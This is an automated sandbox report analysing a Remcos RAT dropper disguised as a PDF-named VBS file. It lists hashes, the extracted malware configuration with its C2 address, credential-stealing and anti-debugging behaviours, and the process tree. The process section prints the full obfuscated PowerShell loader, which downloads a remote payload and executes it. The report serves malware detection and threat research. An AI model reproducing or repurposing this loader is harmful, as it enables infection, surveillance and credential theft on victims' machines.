Analysis

  • max time kernel
    297s
  • max time network
    297s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-10-2024 09:19

General

  • Target

    MV STARSHIP AQUILA_pdf.vbs

  • Size

    19KB

  • MD5

    427c143dcebde77d0881da0589b0392f

  • SHA1

    732631d0993cb724e8e93dd146e871026e5a4874

  • SHA256

    fd352ed76e51602f74cdf8305a6da9386d70909e91f72fbce124afe3a911322a

  • SHA512

    62c1f596fc5cef867caccf40932654129401ee1d0cfcb8aa497e3edebac9e1e5ba6aad5a122b16a0099e1c9ad11d7130c2f39adea082bbf7e223bed2c8b675b6

  • SSDEEP

    384:245uPIaVI9k5nIzIsLBiZOj8SL57C+JdA+IdxbIaOiwkssXir2KDtdnMSa1A0:WPIaVI92I0iiZjSJC+JdA+IdxMBZsXCq

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

154.216.18.214:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-AOD6MB

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MV STARSHIP AQUILA_pdf.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3092
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjexeeafprGeoe ons A,)udl ';$Bajeres=$Irrigably;Fusionsdokumentet (Drunkometer ' pa$Fo G MyL gioDolB aa Prlsha: mmHDa u kaRCyrD WaL ksIProNOm GCr =Hen(R.nT FoeComs C,t a-Verp LoABygtGrehF e sen$.ogb s,ARecJ NeE ToRIn,ERegsPed) Ci ');while (!$Hurdling) {Fusionsdokumentet (Drunkometer 'Li $DilgMonlBiloNe b .raUdslAnk:TriTAf mRe t.vee Pj= a$ FotAp rJeruK temu ') ;Fusionsdokumentet $Daddocky;Fusionsdokumentet (Drunkometer 'BibsGratTeraUttr spTRsk-M lsOv lV rEProE CePBu Gru4Ryg ');Fusionsdokumentet (Drunkometer ' O,$ImmGYualArtoUtrbspaAForL U : B HR eUBarR A.DGi lBetiB onT igDkl=Gyn(KonT .ae osBroTspi-ExppHe AK,nTEdaHVen Tal$ForBEleAkryJWheE AnRUfoe sasRe ) Do ') ;Fusionsdokumentet (Drunkometer ' Le$Atrg abL,veoFugBPalAGulL ro:sluT skRbrno GaMFanl vieVi g yrA hNUn,gBryE arn His Ku= et$Nomg PlL sioCr bAlaAr cL il: krDDite.hem aoC lnBowsNonTDefRBlra Mat CeIVerofloNMits,oofReirLnpi roHPree s,dAabe UdRsky+Co +Goo%he,$Z,oBb.sAPenDIn e loFAppOsulRR pm UdAWatashaltubE soTRe . FeC ilos iuDysnTapT rn ') ;$Konkursbehandlingens=$Badeformaalet[$Tromlegangens];}$Blips=330697;$Nominalising=30103;Fusionsdokumentet (Drunkometer 'Ma.$ KnGUinL MuOsurB Gaa BuLTop: B a oxf LuTReaj s EsuinsofE ChsCal Bie=Nok Te.G D,EFortMaj-DemCIn,OMi.N frTEcoEstrn GiTTve Dra$Lakb I.achlJ E EFrerPaaEChessuk ');Fusionsdokumentet (Drunkometer '.tt$ Pag ilCykoEx,bBesa UdlUnb:Ti sEksiBotl F d oe Cab laeMrknTres,apsWalt Herwi iEksbH,vema tsw su =Kom Gl[sous Uny CosUndt .aeKnymPro. s,CNonoTi nD,iv.reesikrUn.tDa ]Hoo:afs:O sF arRadoPu mP.eBBraaFacs,ere ig6 se4 R,ssletsa.rMaaiFrinIntgRe (Ant$ TrABrnfHe tstajO eedobnshreBels Ge)Lan ');Fusionsdokumentet (Drunkometer 'Cal$ igUd l J,OB zb Una vlBje:N.ab NooPanOUndTHoat toCaspOve Def=Pr, Fri[syns caYRepsEr,TGrae.ermmaa.FreTOmde auxContY p.C me ApN C,c usoPl Ds ai loN erG Tr]sm :mar:Af AUnbsbonCDiri BoIO.d.CorgFolE.ioTAfss koT sgrB liBesNCryglu ( sa$ BrssamIBjeLAsmDs.bEBa,bf.reTeon ,hs etsscuTv.lR AkIVa bAktePa.t Op)Uns ');Fusionsdokumentet (Drunkometer ' Do$R mgE eL TuOFedb ,aA alLDin:UdjBForoMulmAftuAvaLt lDskisVi GWitaQuaRsponOoiEst.tIn = kk$PerBVidOUnwODo.t ,aTM,lO C P En.MelssysuunibDiasKlaT MaRCamis rn AngMed(skr$PatbBr l A.IBilpUdsssd ,.tj$allnskaoOutmskyi.etNCodab ulUnaITrssAknI .bnPr G Pr) Po ');Fusionsdokumentet $Bomuldsgarnet;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2880
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#slagtstavles Talepdagogs Regnskabsafdelings Wardwomen Yokeage #>;$Ganespalter144='Triumferne';<#Whirler Kjepladser Fllesmngde #>;$Gader=$adawe+$host.UI;If ($Gader) {$Fuglearter++;}function Drunkometer($Microfibril){$Reflation=$Elektromotoren+$Microfibril.'Length'-$Fuglearter; for( $Apoplastogamous=3;$Apoplastogamous -lt $Reflation;$Apoplastogamous+=4){$Wettability='Compotation';$Forbrugermotiveringer223+=$Microfibril[$Apoplastogamous];$Dimetient='Rememberers';}$Forbrugermotiveringer223;}function Fusionsdokumentet($Achlorhydria){ &($Companioning) ($Achlorhydria);}$Malie=Drunkometer 'smaM unospuz kaiProlplal ssaO,s/ste5Dep. la0Rep sca( rWB,uiD.mnResdVekoFa wC ms ud BifNFreTRoi Kog1Bes0Apo.Cal0sip;Fir eW B.iP rnsto6pro4 at; Ni abexCa.6Ma 4 ct;Ite Gulrsu,vsev:kos1 la2s.l1 Gr.The0Ged)Udk subGBone DocBl kg,loste/Pre2Pon0Mat1 Un0Reh0F.r1Emb0Dod1Dyp BreFHypiCharsnae spf amo R xPla/Ha.1 u2H t1Goi.run0D,r ';$Partitioned=Drunkometer 'Domuou,sU teNonR El-CocaGerGEddeRhoNT gtInd ';$Konkursbehandlingens=Drunkometer 'dephDatt.lmtPispC u:In /Cli/ jee stq P u C iInspBud4 K .Ti.sAnahGeloTheppon/ChiF unvAvlMNymV ModEelpOveFslug,ra/ExtAsaftEn oHollTrosWov.CivrAstaP.arMer ';$Afspadseringspenge=Drunkometer 's,a>Dif ';$Companioning=Drunkometer ' ui BrEC.xXMik ';$Congressist='Banditter';$Flunkeyhood='\Plasmagel.Ref';Fusionsdokumentet (Drunkometer ' R $,drGIs l oOga BEx Aseklatt:Tr,ILrerMumRsvvIspaGantAskybAcalencyEpa=La,$s,vE B NCanvR a:Renast PHigpsupD Boa ssTFika f+Rin$MulFPhelsugu,erNsenksaleTesy OpHC looveoBe.DBrn ');Fusionsdokumentet (Drunkometer 'Bip$Hypg T LKrooMarBTa A.shlbas:Vanb ndAR.cD ale riFPleo TjRs lms oAspra Cal R E M T,ri=Unf$Tr K nooNoun ftKMisuKrirP,dsLasBForE skHIntANo NsafD,ecL.ugI N nBlag H.e,einsp s su.ThescolPLamLMaair,iTRib( fo$ ChaCo f PlsUd.PPupaResdAe s lyEUptRB liB kN soG ,dsBisPNgteUd.N C G,niePsa) Ac ');Fusionsdokumentet (Drunkometer 'Tio[chinU iE veTifr.salsEleE Unr favAulIH lCst.eQuapsenoRapIBa,NA eTK lM Kra A.N BeABioGRege ImRByl]sam:Re : Tys iEcopCLeoUGrur GaIEndtHeaY appAf.rUnroFutTParO CoCspao roLsp U.v=Jor on[TorNdukEetat o.No.s .oE b.cAriU A,rpomi anTL,eYLftPUroRProOPhitMalOLntC Dio orLRumt UdYAlap VaEs r]Ani: on:OrdTPauldatsAba1Bld2Dis ');$Konkursbehandlingens=$Badeformaalet[0];$Tilkendegivelsers=(Drunkometer 'Ma $Te.g,ynLwhoORe,bUnsAK slPse: reHAddi.ndlNonIPlu=UfonAlke ,eWMas-UdlOViob urjsniEBeaCDistElf Op sB sytahsseeTKlae ivMI,o. alNBefEObjtsne. unWBagesukbGaucsupLseeiXl E KnNsogTRjs ');Fusionsdokumentet ($Tilkendegivelsers);Fusionsdokumentet (Drunkometer ' ac$DemH sli smlBefi Ph.PinHR ieUn aOrddFodeKarrUresspe[ am$ urPAngaI.dr MatFatiG ntTiliUmboM snProePurdT,t]Upp=Kla$segMTamaPoll oriAf eFot ');$Daddocky=Drunkometer ' pu$La HTe,i valDipiP,l.BygDdoroE,awB dnParlMesoPo aTapdEnuFE,hitrnl MoeGri(Dat$MonKcosoUgjnsqukabsu VarGifsDrubUnceA.kh aaForn T ds,mlLitiDisnsuhgHile ednsi somb,Don$GelB AtaUdvjexeeafprGeoe ons A,)udl ';$Bajeres=$Irrigably;Fusionsdokumentet (Drunkometer ' pa$Fo G MyL gioDolB aa Prlsha: mmHDa u kaRCyrD WaL ksIProNOm GCr =Hen(R.nT FoeComs C,t a-Verp LoABygtGrehF e sen$.ogb s,ARecJ NeE ToRIn,ERegsPed) Ci ');while (!$Hurdling) {Fusionsdokumentet (Drunkometer 'Li $DilgMonlBiloNe b .raUdslAnk:TriTAf mRe t.vee Pj= a$ FotAp rJeruK temu ') ;Fusionsdokumentet $Daddocky;Fusionsdokumentet (Drunkometer 'BibsGratTeraUttr spTRsk-M lsOv lV rEProE CePBu Gru4Ryg ');Fusionsdokumentet (Drunkometer ' O,$ImmGYualArtoUtrbspaAForL U : B HR eUBarR A.DGi lBetiB onT igDkl=Gyn(KonT .ae osBroTspi-ExppHe AK,nTEdaHVen Tal$ForBEleAkryJWheE AnRUfoe sasRe ) Do ') ;Fusionsdokumentet (Drunkometer ' Le$Atrg abL,veoFugBPalAGulL ro:sluT skRbrno GaMFanl vieVi g yrA hNUn,gBryE arn His Ku= et$Nomg PlL sioCr bAlaAr cL il: krDDite.hem aoC lnBowsNonTDefRBlra Mat CeIVerofloNMits,oofReirLnpi roHPree s,dAabe UdRsky+Co +Goo%he,$Z,oBb.sAPenDIn e loFAppOsulRR pm UdAWatashaltubE soTRe . FeC ilos iuDysnTapT rn ') ;$Konkursbehandlingens=$Badeformaalet[$Tromlegangens];}$Blips=330697;$Nominalising=30103;Fusionsdokumentet (Drunkometer 'Ma.$ KnGUinL MuOsurB Gaa BuLTop: B a oxf LuTReaj s EsuinsofE ChsCal Bie=Nok Te.G D,EFortMaj-DemCIn,OMi.N frTEcoEstrn GiTTve Dra$Lakb I.achlJ E EFrerPaaEChessuk ');Fusionsdokumentet (Drunkometer '.tt$ Pag ilCykoEx,bBesa UdlUnb:Ti sEksiBotl F d oe Cab laeMrknTres,apsWalt Herwi iEksbH,vema tsw su =Kom Gl[sous Uny CosUndt .aeKnymPro. s,CNonoTi nD,iv.reesikrUn.tDa ]Hoo:afs:O sF arRadoPu mP.eBBraaFacs,ere ig6 se4 R,ssletsa.rMaaiFrinIntgRe (Ant$ TrABrnfHe tstajO eedobnshreBels Ge)Lan ');Fusionsdokumentet (Drunkometer 'Cal$ igUd l J,OB zb Una vlBje:N.ab NooPanOUndTHoat toCaspOve Def=Pr, Fri[syns caYRepsEr,TGrae.ermmaa.FreTOmde auxContY p.C me ApN C,c usoPl Ds ai loN erG Tr]sm :mar:Af AUnbsbonCDiri BoIO.d.CorgFolE.ioTAfss koT sgrB liBesNCryglu ( sa$ BrssamIBjeLAsmDs.bEBa,bf.reTeon ,hs etsscuTv.lR AkIVa bAktePa.t Op)Uns ');Fusionsdokumentet (Drunkometer ' Do$R mgE eL TuOFedb ,aA alLDin:UdjBForoMulmAftuAvaLt lDskisVi GWitaQuaRsponOoiEst.tIn = kk$PerBVidOUnwODo.t ,aTM,lO C P En.MelssysuunibDiasKlaT MaRCamis rn AngMed(skr$PatbBr l A.IBilpUdsssd ,.tj$allnskaoOutmskyi.etNCodab ulUnaITrssAknI .bnPr G Pr) Po ');Fusionsdokumentet $Bomuldsgarnet;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4584
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lvnxxhchidnwcmpbnfdkmrrxjl"
        3⤵
          PID:3860
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lvnxxhchidnwcmpbnfdkmrrxjl"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:3024
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oxsqyzmawlfbetlneqpmpwlosrhfq"
          3⤵
            PID:1068
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\oxsqyzmawlfbetlneqpmpwlosrhfq"
            3⤵
            • Accesses Microsoft Outlook accounts
            • System Location Discovery: System Language Discovery
            PID:4272
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yrgazsxcstxoozzrnakfajgxbgrgjtse"
            3⤵
              PID:724
            • C:\Windows\SysWOW64\msiexec.exe
              C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\yrgazsxcstxoozzrnakfajgxbgrgjtse"
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4048

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          806286a9ea8981d782ba5872780e6a4c

          SHA1

          99fe6f0c1098145a7b60fda68af7e10880f145da

          SHA256

          cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

          SHA512

          362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a025q2nm.gbu.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\lvnxxhchidnwcmpbnfdkmrrxjl

          Filesize

          4KB

          MD5

          c3c5f2de99b7486f697634681e21bab0

          SHA1

          00f90d495c0b2b63fde6532e033fdd2ade25633d

          SHA256

          76296dc29f718988107d35d0e0b835c2bf3fc7405e79e5121aa4738f82b51582

          SHA512

          7c60ffdc093de30e793d20768877f2f586bee3e948767871f9a1139252d5d2f593ba6f88ce0ed5f72c79faddb26186792df0581e4b6c84d405c44d9d12f951b8

        • C:\Users\Admin\AppData\Roaming\Plasmagel.Ref

          Filesize

          469KB

          MD5

          1b38697ebc98d6c5d58f611fe25462ea

          SHA1

          6c3ec81b431c5a28add72f8a551d498e8a2c0029

          SHA256

          32e45daf39a4db42ca66861aa434cece672a17fc4365bfe7e6d67158ecea1bfb

          SHA512

          18829b85a88ba8acfc3ceb71824ea21d51a73adc6451fafc5baf06dcc0819ad420f258dcde6e5e75245ff8cb86b3fe47ac314206590e896722de5168ed989547

        • memory/2444-79-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-76-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-66-0x000000001E690000-0x000000001E6A9000-memory.dmp

          Filesize

          100KB

        • memory/2444-69-0x000000001E690000-0x000000001E6A9000-memory.dmp

          Filesize

          100KB

        • memory/2444-97-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-96-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-95-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-94-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-93-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-92-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-71-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-88-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-81-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-80-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-70-0x000000001E690000-0x000000001E6A9000-memory.dmp

          Filesize

          100KB

        • memory/2444-78-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-77-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-72-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-73-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-75-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-45-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2444-74-0x0000000000C00000-0x0000000001E54000-memory.dmp

          Filesize

          18.3MB

        • memory/2880-11-0x00007FFAE2650000-0x00007FFAE3111000-memory.dmp

          Filesize

          10.8MB

        • memory/2880-0-0x00007FFAE2653000-0x00007FFAE2655000-memory.dmp

          Filesize

          8KB

        • memory/2880-15-0x00007FFAE2650000-0x00007FFAE3111000-memory.dmp

          Filesize

          10.8MB

        • memory/2880-12-0x00007FFAE2650000-0x00007FFAE3111000-memory.dmp

          Filesize

          10.8MB

        • memory/2880-19-0x00007FFAE2650000-0x00007FFAE3111000-memory.dmp

          Filesize

          10.8MB

        • memory/2880-1-0x0000017662420000-0x0000017662442000-memory.dmp

          Filesize

          136KB

        • memory/2880-16-0x00007FFAE2650000-0x00007FFAE3111000-memory.dmp

          Filesize

          10.8MB

        • memory/3024-52-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/3024-60-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/3024-54-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/3024-50-0x0000000000400000-0x0000000000478000-memory.dmp

          Filesize

          480KB

        • memory/4048-59-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/4048-57-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/4048-55-0x0000000000400000-0x0000000000424000-memory.dmp

          Filesize

          144KB

        • memory/4272-56-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/4272-58-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/4272-51-0x0000000000400000-0x0000000000462000-memory.dmp

          Filesize

          392KB

        • memory/4584-40-0x0000000007BF0000-0x0000000007C86000-memory.dmp

          Filesize

          600KB

        • memory/4584-36-0x0000000006960000-0x000000000697E000-memory.dmp

          Filesize

          120KB

        • memory/4584-41-0x0000000007B80000-0x0000000007BA2000-memory.dmp

          Filesize

          136KB

        • memory/4584-44-0x00000000093B0000-0x0000000009E0B000-memory.dmp

          Filesize

          10.4MB

        • memory/4584-39-0x0000000006F00000-0x0000000006F1A000-memory.dmp

          Filesize

          104KB

        • memory/4584-38-0x00000000081D0000-0x000000000884A000-memory.dmp

          Filesize

          6.5MB

        • memory/4584-37-0x00000000069B0000-0x00000000069FC000-memory.dmp

          Filesize

          304KB

        • memory/4584-42-0x0000000008E00000-0x00000000093A4000-memory.dmp

          Filesize

          5.6MB

        • memory/4584-34-0x0000000006320000-0x0000000006674000-memory.dmp

          Filesize

          3.3MB

        • memory/4584-24-0x0000000006230000-0x0000000006296000-memory.dmp

          Filesize

          408KB

        • memory/4584-23-0x00000000061C0000-0x0000000006226000-memory.dmp

          Filesize

          408KB

        • memory/4584-22-0x0000000005A90000-0x0000000005AB2000-memory.dmp

          Filesize

          136KB

        • memory/4584-21-0x0000000005B20000-0x0000000006148000-memory.dmp

          Filesize

          6.2MB

        • memory/4584-20-0x0000000003070000-0x00000000030A6000-memory.dmp

          Filesize

          216KB